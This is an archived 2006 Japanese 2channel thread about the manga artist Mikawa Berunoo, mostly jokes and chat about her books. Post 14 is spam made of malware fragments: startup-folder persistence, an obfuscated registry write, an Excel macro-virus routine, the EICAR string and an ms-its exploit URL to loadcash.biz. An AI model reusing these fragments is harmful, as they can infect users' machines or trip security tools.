5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【いぬのふぐり】美川べるのPart25【ふぐりふぐり】

1 :花と名無しさん:2006/12/11(月) 11:47:06 ID:???0
いぬのふぐり:ゴマノハグサ科の2年草。実が犬の陰嚢に似ているところから名づけられた植物

前スレ
【熱々じじい】美川べるのPart25【アイランド】
http://comic6.2ch.net/test/read.cgi/gcomic/1160146265/

有志の過去ログ保管庫です
http://www.geocities.jp/verno_m/
美川べるのスレ第2保管庫
http://pinoko.biz/verno/

2 :花と名無しさん:2006/12/11(月) 11:48:04 ID:???0
【超いやらしい】美川べるのPart24【スレッド】
http://comic6.2ch.net/test/read.cgi/gcomic/1157036159/
【生身の女性は】美川べるのPart23【えげつない】
http://comic6.2ch.net/test/read.cgi/gcomic/1153998247/
【新刊あります】美川べるのpart22【コミケかー!!】
http://comic6.2ch.net/test/read.cgi/gcomic/1150295983/
【リリカルマジカル】美川べるのPart21【鈍器になあれ】
http://comic6.2ch.net/test/read.cgi/gcomic/1145964098/
【なんだこれ】美川べるのPart20【俺が聞きてえ】
http://comic6.2ch.net/test/read.cgi/gcomic/1143379736/
【全身タイツ】美川べるのPart19【網タイツ】
http://comic6.2ch.net/test/read.cgi/gcomic/1140715759/
【ウニ型ダイヤ】美川べるのPart18【あ痛】
http://comic6.2ch.net/test/read.cgi/gcomic/1138656916/
【入ってエロス】美川べるのPart17【見てエロス】
http://comic6.2ch.net/test/read.cgi/gcomic/1135166578/
【関ジャニ】美川べるのPart16【むげん】
http://comic6.2ch.net/test/read.cgi/gcomic/1133011401/
【限定板で】美川べるの【カトキ立ち】
http://comic6.2ch.net/test/read.cgi/gcomic/1129359792/
【予約して並ぶ】美川べるのPart14【限定版発売日】
http://comic6.2ch.net/test/read.cgi/gcomic/1124743630/
【カバーの下から】美川べるのPart13【…油断シタor2゙】
http://comic6.2ch.net/test/read.cgi/gcomic/1120823305/

3 :花と名無しさん:2006/12/11(月) 11:49:24 ID:X/yMKnuW0
【チン】美川べるのpart12【ジャオロース】
http://comic6.2ch.net/test/read.cgi/gcomic/1118333598/
【も っ】美川べるのpart11【ち り】
http://comic6.2ch.net/test/read.cgi/gcomic/1117379063/
【ふくらむマッチョ】美川べるのpart9【選び放題】
http://comic6.2ch.net/test/read.cgi/gcomic/1114089849/
【僕の出口が】美川べるのPart8【入り口に】
http://comic6.2ch.net/test/read.cgi/gcomic/1112282210/
【しもんマンが】美川べるのPart7【服を着た】
http://comic6.2ch.net/test/read.cgi/gcomic/1110553056/
【塗料の質が】美川べるのPart6【落ちるから!】
http://comic6.2ch.net/test/read.cgi/gcomic/1106756203/
【しもんマン】美川べるのPart5【エクスカリビャー】
http://comic6.2ch.net/test/read.cgi/gcomic/1100622815/
【俺の心の】美川べるのPart4【萌え師匠】
http://comic6.2ch.net/test/read.cgi/gcomic/1095778023/
【ガチャチソ】美川べるの Part3【オブジョイトイ】
http://comic6.2ch.net/test/read.cgi/gcomic/1088675651/
【大・丈・夫】美川べるの Part2【ミカベルのスレだよ】
http://comic4.2ch.net/test/read.cgi/gcomic/1079220804/
美川べるの【ストレンジプラス】
http://comic.2ch.net/test/read.cgi/gcomic/1059902904/

4 :花と名無しさん:2006/12/11(月) 11:54:17 ID:KzHJm7UZ0
4ゲト

5 :花と名無しさん:2006/12/11(月) 11:56:05 ID:???0
<単行本>
・学園天国パラドキシア(一迅社REXコミックス 1巻)
・超空転神トランセイザー(講談社KCDX 1巻)
・ストレンジ・プラス(一迅社ゼロサムコミックス 1-6巻)
・青春ばくはつ劇場(講談社KCDX 1-2巻)
・戦場のハピィ・ライフ(講談社KCDX 1巻)
・漢式青春ばくはつ劇場(講談社KCDX 全3巻)
・プラスティックベイビィズ1、2、3(光文社火の玉ゲームコミック)>メガテンシリーズ
・美川べるののゲーム魂(DNAメディアコミックススペシャル1巻)
 >カプコンヒーロー、キングオブファイターズ、ギルティギア、ジャスティス学園、ブレスオブファイア、ブラックマトリクス、東鳩
<連載>
・学園天国パラドキシア(月刊コミックREX)
・ストレンジ・プラス(コミックゼロサム)
・青春ばくはつ劇場(別冊少女フレンド)
・シガラミン(ザ別フレ←旧Juliet) >各々の雑誌の別冊にも執筆率高し
・変身魔女っ娘トランシーナ(e-manga)
・超空転身トランセイザー(e-manga)
ttp://moura.jp/manga/e-manga/
<読切>(コミックス未収録)
・王子様 イン キャッスル(まんがくらぶ読切)
・フリーター Go-Fight!(まんがくらぶ読切)
・ゲームアンソロ本いろいろ>魔剣X、アンジェ、遙かなる時空の中で、封神演義(コーエー版)、鉄拳3、ゼルダの伝説、
 タクティクスオウガ、転生學園幻蒼録、テイルズオブファンタジア、ボンバーマン、ぷよsun、がんばれ森川君、エヴァetc.…
<その他>
・「ストレンジ・プラス ピンズコレクション」
・「ストレンジ・プラス」CDドラマ1,2(通販のみ。再販決定)

・次スレ立ては>>950さん(950がダメなら960)がお願いします

6 :花と名無しさん:2006/12/11(月) 11:58:58 ID:???0
Part25のままで立ててしまった…orz
申し訳ない

7 :花と名無しさん:2006/12/11(月) 12:16:06 ID:???O
>>1=>>6
気にするでないよ。それよりも乙ふぐり。

ふぐり置いていきますね
つω

8 :花と名無しさん:2006/12/11(月) 12:48:46 ID:???O
>>1乙のふぐりωふぐりふぐり

9 :花と名無しさん:2006/12/11(月) 13:28:07 ID:???0
なんだこのスレタイはーw

10 :花と名無しさん:2006/12/11(月) 13:39:42 ID:???O
12:★☆少女漫画しりとり☆★Part9(857)
13:【いぬのふぐり】美川べるのPart25【ふぐりふぐり】(9)
14:近親相姦もにについて語ろう part8(616)

今、こんな並び順。しり、ふぐり、近親。

11 :花と名無しさん:2006/12/11(月) 15:32:35 ID:???0
パラベラム……じゃない、パラドキシアってノリとしてはトランセイザーマイナスシリアスなんだな。
(パラベラム……銃弾の種類。9×19、もしくは9mmパラベラムで検索するとよし)
だがワロタ。


12 :花と名無しさん:2006/12/11(月) 16:23:58 ID:???O
>>1

>>11
物騒なもんぐぐらせるなw
このスレタイに惹かれて何も知らないひとが覗きに来てそこからファンになったりしないかな(*´∀`)

13 :花と名無しさん:2006/12/11(月) 17:24:58 ID:???O
>>11
パラベラムっつーとペル罰の武器買えるバー思い出す

14 :<body onload=window()>:2006/12/11(月) 17:35:02 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

15 :花と名無しさん:2006/12/11(月) 20:04:04 ID:???0
>>1
乙ω

それにしても最近は毎回↑貼られるな。削除してくんないかな〜。

16 :花と名無しさん:2006/12/11(月) 20:41:53 ID:???O
いちもつ、と書き込もうとしたら上に「生〇出し当り前」とあってワロタ。

17 :花と名無しさん:2006/12/11(月) 20:44:40 ID:???O
パラドキシアで、寧々ちゃんが大好きな好きな俺は異端児ですか?

18 :花と名無しさん:2006/12/11(月) 21:08:46 ID:???O
ttp://www.akibablog.net/archives/2006/12/etc_144.html
こういう入手方法は正宗さんがきっと許さない

19 :花と名無しさん:2006/12/11(月) 21:14:21 ID:???O
>>17
俺も寧々様大好きだZe☆

20 :花と名無しさん:2006/12/11(月) 22:30:21 ID:???0
しかし俺はストプラ版花子たん

21 :花と名無しさん:2006/12/12(火) 00:11:32 ID:???0
一成と七緒はもらった!
二人そろって可愛がっちゃるわーーーー!!!

22 :花と名無しさん:2006/12/12(火) 21:04:10 ID:???O
因業ババアなんて単語がヒロインの感想で出てきたのって、大槻凛が世界初じゃないスかね…

23 :花と名無しさん:2006/12/12(火) 22:46:45 ID:???O
サザエさんに出てこなかったっけ?

24 :花と名無しさん:2006/12/12(火) 22:55:06 ID:???0
イモねーちゃん!いんごーババー!

>>23
ありゃカツオの発言だ。少なくともヒロインではない。

25 :花と名無しさん:2006/12/12(火) 23:01:57 ID:???0
うしとらは?
って、アレはリアクション付だから違うか。

26 :花と名無しさん:2006/12/13(水) 00:02:28 ID:a+C3QHeAO
潮女体化禁止
でもちょっとワロタw

27 :花と名無しさん:2006/12/13(水) 00:24:30 ID:???O
サナダムシプレイってディープだったんだ…

28 :花と名無しさん:2006/12/13(水) 01:22:05 ID:???0
満足だ
 僕の主食は
  サナダムシ!!

29 :花と名無しさん:2006/12/13(水) 01:26:45 ID:???0
レッドワールドに迷い込んだ大竹さん乙です

30 :花と名無しさん:2006/12/13(水) 14:37:46 ID:???O
やっぱり許容されるのは触手プレイくらいまでだよなー
産卵とか

31 :花と名無しさん:2006/12/13(水) 15:27:15 ID:???O
それはつまり、香織の頭でナニをするという事か。

32 :花と名無しさん:2006/12/13(水) 15:45:40 ID:???0
>>27-30
おんもでやれ

久々に本斬に行って暇つぶし。ふとストプラがあるかなーと思い見てみた。
「み、み、み……おおあったあった。1、2、3、4、5って黒ォ――!?」
限定版ハケソ。即買いしました。
何気にバーコードがなくてびっくり。でもその感想が「大人になる呪文(著・パニックアタック)1.5みたいだな」だった俺って……

ちなみにうしとらの因業ババアは「うしおが言って『誰がインゴーババアよっ』と締められる」じゃなかったか?

33 :花と名無しさん:2006/12/13(水) 17:09:15 ID:???O
>>32
ああ、「なつやすみ」か。本編しょっぱなが「陰獣vs低学年」のあれか。

34 :花と名無しさん:2006/12/13(水) 17:48:58 ID:???0
ちょ、まーさむーねさーん……
というかパニアタで通じるのもアレだと思うが。

35 :花と名無しさん:2006/12/13(水) 21:08:57 ID:???O
3巻もバーコードなしだったはず。そっち系の住人もある程度いそうだものな、ここ。
パラドキシアは百合星式おゆうぎうた聞きながら読んだ奴とか。

ところでミカベルに話を修正するけど、パラドキシアあとがき。
制服のスカートの種類が選べる…てエロゲやアニメでよくそんな設定あるけど、そういう学校て現存してるの?

36 :花と名無しさん:2006/12/13(水) 21:23:17 ID:???O
>>35
あるよー。
スカートやブラウスの色や柄を自分の好みで変えられたり出来たりする学校とかある。
今はそういう学校が増えてるみたい。

37 :花と名無しさん:2006/12/13(水) 21:46:44 ID:???O
ジョジョキャラバリに改造した制服もアリなのか?

アリならも1回高校生やるー

38 :花と名無しさん:2006/12/13(水) 22:00:44 ID:???0
>>32
ミカベルに関係ない質問で申し訳ないが、本斬って何ですか?ぐぐっても
判らんかった

39 :花と名無しさん:2006/12/13(水) 22:11:20 ID:???0
ヒント:斬→切

40 :花と名無しさん:2006/12/13(水) 22:12:29 ID:???0
私の母校の制服はメインとサブの2種類スカートあった。男子もチェックの柄が違うのがあったな。
あとリボン、ネクタイも柄違いであった。
式の時だけメインで普段は好きなのを着ればいい、って感じで。
まあ、私の在学中に変わっちゃったんだけどね。

41 :花と名無しさん:2006/12/13(水) 23:55:14 ID:???0
中高共にセーラーだったから、そんな都会のおしゃれ学校羨ましい…

自分もも一回高校生やるー

42 :花と名無しさん:2006/12/14(木) 00:08:16 ID:???O
では、セーラーブルムーンの衣装借りてきますね!

43 :花と名無しさん:2006/12/14(木) 01:25:10 ID:???O
現役だけどそんなおしゃれな学校に行きたかった…
女子校なんて恥じらいがなくなるだけで夢もなにもないよ!

44 :花と名無しさん:2006/12/14(木) 01:54:12 ID:???O
えっ!?嘘だぁん!!
百合でスールでごきげんようじゃないの!?
なぜそんな残虐非道夢物語を!?

45 :花と名無しさん:2006/12/14(木) 02:20:43 ID:???O
一部の都立なら制服はない…から、みんなエセ制服だよ。
ヒロミチとかEASTBOYのスカート+セーター、適当な靴下、適当なブレザー。
完全に普通なパンツスタイルや重ね着スカートはそんなにいるわけではなく全員コスプレと言われたら否定できない。
男子は半々くらいだったかな?

46 :花と名無しさん:2006/12/14(木) 06:47:29 ID:???O
今は科目も制服も選択に幅があるんだなぁ、精々昔は制服改造くらいだよ。
といっても短ランにボンタンとか…ああ恥ずかしい過去。

47 :花と名無しさん:2006/12/14(木) 09:18:59 ID:???O
>43
中学の同級生が実際にお嬢様ミッションスクールに行ったが
実態は自分とこの公立高の女子クラスと大差無かった。



夢見てるのはお互い様だ。
全寮制男子高のフレーズは甘酸っぱく思えるが
実際はただ酸っぱそうだ。色んな意味で

48 :花と名無しさん:2006/12/14(木) 12:06:41 ID:???O
夏場の男子校は目に来るくらいすっぱいよ。

遅刻しそうになって全力疾走で教室駆け込んだ直後すっぱさにヤラれて
もんじゃ焼きの花を咲かせたのも今ではいい思い出

49 :花と名無しさん:2006/12/14(木) 12:36:30 ID:???O
…姉の女子校では先輩の薙刀や新体操の試合の応援に行ったり(応援する側は部活とは関係ない)
クッキーやケーキなど差し入れたり、校門までの少しの間を一緒に帰ったりしてたらしい
百合とか関係なくナチュラルにそんなふいんき(ryだったらしいが…

その話を聞いて「行かなくて良かった!」と思った自分、今思えば夢の欠けらもねえ

50 :花と名無しさん:2006/12/14(木) 14:22:54 ID:???O
なんで皆制服可愛いんだよ…!自分の所は男子は学ラン(ボタンが小さくて布地と同色で見にくい)女子はブレザー(リボン等の飾り無し、銀行員のような共布ベスト付き)だった…。

今ではセーラー服二次元キャラが大好きです。

51 :花と名無しさん:2006/12/14(木) 15:44:01 ID:???O
自分はブレザーに赤スカートで、キヨ助よろしく黒タイツ着用です
「卒業したらセーラー服買って着る」って子もいるが…

52 :花と名無しさん:2006/12/14(木) 19:10:34 ID:???0
自分は中学(転校したから2校行ったのにどっちも)も高校も
似たよーな色形の地味なブレザーだった。
セーラー服はときメモのコスで初めて着ました。
セーラー脱ぎ着しにくいよセーラー。わき腹がつったよセーラー。
中高セーラーだった友人はそれがデフォだと言っていた。尊敬した。

53 :花と名無しさん:2006/12/14(木) 19:18:24 ID:???O
ああ、だから脇にチャック(あえてジッパーと言わない)が付いてるタイプがあるのか。

54 :花と名無しさん:2006/12/14(木) 19:36:41 ID:???0
女子はセーラーでもブレザーでも構わないけど
男子の学ランだけは譲れんね

55 :花と名無しさん:2006/12/14(木) 19:42:04 ID:???O
校則で着くずし禁止の学校の学ラン、学ランて通気性悪いのでそのかなり臭い人がいます。

56 :花と名無しさん:2006/12/14(木) 20:29:00 ID:???0
男子のブレザーも良いものですぞ。
若い細い体がワイシャツのスキマからチラリズム。

高校は制服で選んだクチだったので、後悔はしとらん。
ただブランドものだったのでえらい高かった記憶があるが。


57 :花と名無しさん:2006/12/14(木) 20:34:34 ID:???O
ぜんぜん話わるんだけどよー、花子たんの外見年齢は9歳くらい?

58 :花と名無しさん:2006/12/14(木) 20:51:29 ID:???O
7歳くらいじゃね?

59 :花と名無しさん:2006/12/14(木) 21:32:49 ID:???O
>58
メル欄で主張するなw
ちなみに私は中高セーラーでなかった為に
三十路の未だに憧れる…
学ランは遊びで借りて着た。

しかし高校の近くの中学は夏服がQ子のようなセーラー(しかも水色)で
かなり目の保養ですた。今や制服変わってしまったのが悔やまれる(ちなみに高校はン十年創立以来変わらず)。

60 :花と名無しさん:2006/12/14(木) 22:03:56 ID:???0
花子たん、幼女かと思いきや意外と胸あるよな

61 :花と名無しさん:2006/12/14(木) 22:04:20 ID:???0
雑談スレー

62 :花と名無しさん:2006/12/14(木) 23:19:59 ID:JXUh6t8m0
とりあえずこれだけ言っておこう。
山田さんは俺の嫁

63 :花と名無しさん:2006/12/14(木) 23:21:14 ID:???0
小林カツ代は俺の嫁

64 :花と名無しさん:2006/12/14(木) 23:24:05 ID:???O
やっと学パラ買えたぜ!マジカルプリンスと花子たんの正装にやられた
名前の元ネタだが、大槻は分かるが韮沢の方が分からん…

ところでQ子って生前から内心エロエロだったの?

65 :花と名無しさん:2006/12/14(木) 23:34:24 ID:???O
>>35
私の行ってた高校はスカート4種類で、ブラウス2種類、セーラー1種類、リボン3種類で、
コーディネート自由だったよ。まぁ、5年前ぐらい前だから今は分からんが。
ちなみにスゴイ田舎。女子校。ミッション系。百合有り。

66 :花と名無しさん:2006/12/14(木) 23:36:43 ID:???0
>64
トンデモ本で有名な「たま出版」の社長<韮沢

たけスィーのTVタックルで、超常現象肯定派の一員として
大槻とバトルしてた人っつったらわかる?

67 :花と名無しさん:2006/12/14(木) 23:40:18 ID:???O
>>60
ハト胸です。

百合は色白黒髪ロングヘアーの美少女のものです。

68 :花と名無しさん:2006/12/14(木) 23:55:25 ID:???O
>>66
ああ!あの人韮沢って名前だったのか…

69 :花と名無しさん:2006/12/14(木) 23:59:10 ID:???O
>>63
カツ代タンの裸エプロンて絶対エロいよな。だってワンショルダーだぜ?ポロリ度高いよ?
プロレス時代のアニマル浜口を彷彿とさせるぜ?そりゃケンタロウも料理するわ。

70 :花と名無しさん:2006/12/15(金) 01:28:13 ID:???O
大槻ケンヂと超絶クリーチャー画家韮沢かと(´・ω・`)

71 :花と名無しさん:2006/12/15(金) 07:11:38 ID:???O
また年末にあのテレ朝の大槻vs韮沢するのかな?
だとしたら今年は脳内でミカベル少女キャラに変換して楽しめそうだ。
末期のオタクってホント便利ですね。

72 :花と名無しさん:2006/12/15(金) 08:03:34 ID:???O
セーラー&ブレザーは若い人向けなのにー!って脳内神が…

73 :花と名無しさん:2006/12/15(金) 08:09:34 ID:???O
本当は園児服が好きなのだが、内緒だ!
園児が好きなのではない、大人が着ているのが好ましいのだ!流行れ。

74 :花と名無しさん:2006/12/15(金) 08:21:12 ID:???0
美羽さんが園児服…あの年齢を想像しただけで…うあー。

…ん?誰か来たみたいだ。ちょっと見てくる。

75 :花と名無しさん:2006/12/15(金) 10:15:25 ID:???0
74はどうしたんだ、もう2時間近く戻って来ないじゃないか。
ちょっと見てくる。
…痛っ!誰だよこんなところに物を置いたの…ってヒィィィィィ!74!!!

76 :花と名無しさん:2006/12/15(金) 10:47:27 ID:???O
そして誰もいなくなった…

77 :花と名無しさん:2006/12/15(金) 10:48:58 ID:???O
とりあえず立たせておきますね

つii

78 :花と名無しさん:2006/12/15(金) 13:45:48 ID:???0
忘れもんだぜ

つW

79 :花と名無しさん:2006/12/15(金) 13:52:10 ID:???O
ちょw何この流れw

80 :花と名無しさん:2006/12/15(金) 17:14:52 ID:???0
パチもん置いていきますね

つ ω

81 :花と名無しさん:2006/12/15(金) 18:17:36 ID:???0
豚義理
学パラ買って真っ先にカバー外して高齢人物紹介に
狂喜乱舞していたら裏側を見て速攻orz
これから本編読みまつ

82 :花と名無しさん:2006/12/15(金) 18:42:22 ID:???0
坂神くんの言うとおり、学園のかけらも無いのに信用するなよ。

ましてやミカベルのカバー裏なんだから。

美羽さんのドロシーコスは巧美子ナースverの方がよかったな……

83 :花と名無しさん:2006/12/15(金) 19:36:46 ID:???0
それはまだ私がいたいけな ょぅι゙ょ だった頃
基本花に興味がなく、花ごとの違いもよく分かっていない情緒の足りないお子様な私が
珍しく覚えた、可憐な野の花

おおいぬのふぐり

近所に群生していたので、毎日遊びに行っては花を愛で、摘み
人が通りかかれば自分の知識を誇ろうと

「おおいぬのふぐりはきれいだなぁ! おおいぬのふぐり、わたしだいすき!」

にこやかに声を張り上げていた、そんな羞恥プレイを思い出しました

84 :花と名無しさん:2006/12/15(金) 20:35:42 ID:???O
無知とは恐ろしいな…。
いや、私たちの心が荒んできてるだけなのか…。

85 :花と名無しさん:2006/12/15(金) 21:03:10 ID:???O
…黙っていたが、ついにこの時が…!
最初学パラ読んだ時から「おおいぬのふぐりもあるが」と思ってたよ

そういや昨日某ラジオで世界の面白地名(V0W的エロ)話してたが
そういうのもQ子さん大喜びだろうな。
エロマンガ島とかヤキマンコとか

86 :花と名無しさん:2006/12/15(金) 21:17:53 ID:???O
小学校入学の時に、爺ちゃんに買って貰った地球儀のエロマンガ島の所に速攻赤ペンで丸をつけた祖父不幸者の俺

87 :花と名無しさん:2006/12/15(金) 22:13:28 ID:???0
83ですが、思い出したので蛇足ですが追記。

あんまり「ふぐりふぐり」くり返す私に
「…その名前はあんまり…言わない方が…いいんじゃないかしら…」
と、つっかえつっかえ注意してきた母親の気まずげな雰囲気。
今なら…分かる…!!
…分かるけど、自分だったらQ子さん並にニラニラしながら子供に連呼させる親になりそうだ。
お母さんごめんなさい。

88 :花と名無しさん:2006/12/15(金) 22:16:22 ID:???O
なかなか素敵な育ち方をしたじゃないかW
どうだね、私の前で淫語を連呼するという職業に就いてみないかね

89 :花と名無しさん:2006/12/15(金) 23:01:12 ID:???O
>>88
時給はいくらだい?

90 :花と名無しさん:2006/12/16(土) 00:18:55 ID:???O
>>88
阿蘇国際マラソン
レマン湖
尻毛町



報酬は1ワード二万でいい。

91 :花と名無しさん:2006/12/16(土) 02:46:57 ID:???0
Q子の誕生秘話を読んで一つ気になったんだが。
以下ネタバレ含む。


Q子の前身、久子はかなり乳がでかく描かれてるけど
これはもしかして今のQ子のスタイルは生前と同じということか!?

だとしたら実にもったいねー!!
B99・W55・H88のナイスバディひざ下スカートセーラー服眼鏡な
内心エロエロ、表面はお堅いみつあみ委員長を失ったのだぞ我々は!
これは人類にとって大きな損失と言っても過言ではない!
いやらしいほうにいやらしいほうへと流れていく谷間お姉さんも好きだけどな。

92 :花と名無しさん:2006/12/16(土) 09:49:40 ID:???O
フフ…レマン湖とは甘いな
沖縄の慢湖があるのを知らないのか。

沖縄ではそれこそ老若男女
ょぅι"ょすら口にするのだ!




(沖縄の人すみません)

93 :花と名無しさん:2006/12/16(土) 10:03:41 ID:???0
>>90
レマン湖と尻毛町はデフォだけど、阿蘇国際マラソンのどこがいやらしいの? マラ?
と不思議に思い、大きな声で音読してからやっと気が付きました

これで満足でしょうかちくしょう!!巧妙なトラップ仕掛けやがって!!ネット調教かよ!!
まったくここの住人はいやらしい人間ばっかりだな!!!



超居心地いーい

94 :花と名無しさん:2006/12/16(土) 11:47:05 ID:???0
キティちゃんのピンクの腹巻とドラゴンボールのトランクス(男性用M)買ってきたおヽ(´∀`*)ノ
トランクスに、べジータとピッコロさんとスーパーサイヤ人2人と龍が描いてあるけど
肝心のトランクスがいないような気がする。ちょっと残念
外ではワコールとかの普通のショーツはいてるけど、
家の中では開放感あふれるトランクス最高(´∀`)

95 :花と名無しさん:2006/12/16(土) 11:49:47 ID:???0
すみません、94です。誤爆しました。ごめんなさい


96 :花と名無しさん:2006/12/16(土) 12:01:45 ID:???0
どこの誤爆だw

97 :花と名無しさん:2006/12/16(土) 12:42:00 ID:???0
>>93-94
これはひどいカオスw

98 :花と名無しさん:2006/12/16(土) 13:13:09 ID:???0
■=★楽しいアメコミ風★=■HAAA! !KAMEHAMEHA-! ドラゴンボールトランクス

■=★紺色です★=■ ドラゴンボールトランクス

うっかり検索しちゃったのよね
で、条件に合ったのがこの二つ
ちょっと欲しくなってきちゃったのよ
ストプラもトランクスとか出たらいいのに
美の神みえっぱりバージョンとか

99 :花と名無しさん:2006/12/16(土) 15:25:57 ID:???O
着せ替えカバー?を付けたベラーは挙足

100 :花と名無しさん:2006/12/16(土) 15:44:30 ID:???0
ttp://www.sizenken.biodic.go.jp/flyway/site/Japan/Manko.html

101 :花と名無しさん:2006/12/16(土) 18:15:30 ID:???0
ナンバ@ミカベル
って、どういう姿になるんだろ・・・(滝汗)

102 :花と名無しさん:2006/12/16(土) 19:29:28 ID:???0
>>101
見たいような見たくないようなw

103 :花と名無しさん:2006/12/16(土) 21:47:50 ID:???0
今さっき世界不●議発見でいやらしいヤシの実がでてたwww

104 :花と名無しさん:2006/12/16(土) 22:48:55 ID:???O
女性の臀部型か

105 :花と名無しさん:2006/12/17(日) 00:05:56 ID:???O
誤爆でつか

106 :花と名無しさん:2006/12/17(日) 00:35:36 ID:???O
でつ とか未だにつかってる奴いるんだな

107 :花と名無しさん:2006/12/17(日) 01:00:11 ID:???0
スヌーピーは今でも人気者だからな。
しょうがない。

108 :花と名無しさん:2006/12/17(日) 01:01:39 ID:???O
でつ
↑例のタイプライター犬

109 :花と名無しさん:2006/12/17(日) 01:04:12 ID:???O
くそっ、>107に先を越された…




悔しいので貴様に
変な語尾をつける呪いをかけたから覚悟しとけよ
フンニャラバー

110 :花と名無しさん:2006/12/17(日) 01:07:34 ID:???0
はっはっは
そんな呪いなんぞ効くわけないだろフンニャラバー

111 :花と名無しさん:2006/12/17(日) 01:18:18 ID:???O
メリーさんが一番カワイイと思う!!

112 :花と名無しさん:2006/12/17(日) 02:42:20 ID:???O
小豆磨先生が一番の萌キャラだよ

113 :花と名無しさん:2006/12/17(日) 05:21:59 ID:???O
フンニャラバーwwwww

114 :花と名無しさん:2006/12/17(日) 07:30:23 ID:???0
>>111
そんな君にこのスレを。(弟くんは立入禁止
ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1147352033/l50

115 :花と名無しさん:2006/12/17(日) 22:15:27 ID:???O
ところで、皆の理想の人間像ってある?ミカベルティックに語ってくれ脳髄グシャー

116 :花と名無しさん:2006/12/17(日) 22:32:46 ID:???0
喪男の自分からすれば、やっぱり正宗さんみたいになりてえなぁ。優しいし、
ヲタだって開き直ってるのも素敵だw

何と言っても正宗さんはオタクとしての情熱が素晴らしいよね。「予約した上
で並んで買う」ってのはオタクとしての本来あるべき姿であって、そういった
情熱こそが今の日本におけるアニメ・マンガの市場を発展さ(ry

117 :花と名無しさん:2006/12/17(日) 22:36:34 ID:???0
正宗は濃すぎるヲタだがヲタであることを除けば標準以上のいい男だからなぁ

118 :花と名無しさん:2006/12/18(月) 00:36:24 ID:???0
だが、三次元の女性とのフラグをことごとく叩き潰さない正宗は正宗ではない

119 :花と名無しさん:2006/12/18(月) 02:16:58 ID:???O
そうだな。
まるで、カレー粉の入ってないカレーの様だな。

120 :花と名無しさん:2006/12/18(月) 06:41:25 ID:???O
私の理想の人は‥‥‥‥‥‥‥美骨盤!!
スボンを大事なトコロが見えるか見えないかぐらいの
ギリッギリまで下げた時に見えるあのライン!!!
くはーーーッ!!たまらん!!!!!!!!!!!!!!!!!!!
ギャランドゥ有り無しどっちでもオケ!!!!!


121 :花と名無しさん:2006/12/18(月) 08:28:06 ID:???O
おっぱい!

122 :花と名無しさん:2006/12/18(月) 08:56:26 ID:???0
ええ いやらしければなんでもいいわ!!

123 :花と名無しさん:2006/12/18(月) 11:35:28 ID:???0
艶男!

124 :花と名無しさん:2006/12/18(月) 13:56:35 ID:???0
そのネタ見た時に真っ先に思い出したのがこれだった。一番下。

ttp://portal.nifty.com/special05/05/29/sato.htm

125 :花と名無しさん:2006/12/18(月) 16:36:08 ID:???O
>そしてコムスメを出し抜くために

笑っちゃいかんが必死な美羽さんが思い浮かんだ。

126 :花と名無しさん:2006/12/18(月) 16:52:01 ID:???0
また新たなチューペットが…

127 :花と名無しさん:2006/12/18(月) 18:26:54 ID:???O
この時期にチューペットか。勘弁してくれよな。

128 :花と名無しさん:2006/12/18(月) 18:31:47 ID:???0
ホットチューペットという手もある、試した事は無いが。

129 :花と名無しさん:2006/12/18(月) 19:10:53 ID:???O
止めた方が良い!それは罠だ!
気の抜けた炭酸飲料を暖めた味がするだなんて!
まさにカオス味だなんて!わさしには言えません!

130 :花と名無しさん:2006/12/18(月) 19:32:57 ID:???O
和さし…じゅるり

131 :花と名無しさん:2006/12/18(月) 20:22:25 ID:???O
輪挿し…きっといやらしいプレイだ

132 :花と名無しさん:2006/12/18(月) 21:36:49 ID:???0
アレだろ?チューペットをしりのあn

133 :花と名無しさん:2006/12/18(月) 21:59:59 ID:???0
イヤっ腸捻転になっちゃう!



人肌に暖めずに尻に物を突っ込むと腸捻転で病院行きになるって都市伝説は本当ですか。

134 :花と名無しさん:2006/12/18(月) 22:23:24 ID:???0
「ちょうてんねん、おなかがよじれちゃうびょうき
 それは『ちょうねんてん』やがなー、なにいうてんねん
 あははー、おなかいたいー」

が真っ先に出てきた俺叶美羽スキー

135 :花と名無しさん:2006/12/18(月) 23:55:59 ID:???O
>>133
よし、その身で試してみるんだ!

つ【キンキンに冷やしたチューペット】

136 :花と名無しさん:2006/12/19(火) 00:02:47 ID:???P
おんもでやれ

137 :花と名無しさん:2006/12/19(火) 00:05:14 ID:???0
野外とは…またマニアックな

138 :花と名無しさん:2006/12/19(火) 00:12:45 ID:???O
…なんだ、その…。
私がわたしをわさしと間違えたばかりに、こんな混沌とした世界にしちまって…。
すまない…、全て私が悪いんだ……。
気をとりなおして、オッサンオブジョイトイでマターリしよう! なっ!?

139 :花と名無しさん:2006/12/19(火) 01:03:57 ID:???O
ああ、オッサンオブジョイトイは可愛いなあ!
わたしオッサンオブジョイトイ大好き!

140 :花と名無しさん:2006/12/19(火) 05:19:01 ID:???0
何そのサマー姉ちゃんみたいな言い回し

141 :花と名無しさん:2006/12/19(火) 07:00:11 ID:???O
あーところで、ゲー魂が出てから2年以上たったのだけど未収録ってまだまだあるよね。
2巻の音沙汰ないって事は前回芳しくなかったのかな。

142 :花と名無しさん:2006/12/19(火) 07:48:01 ID:???0
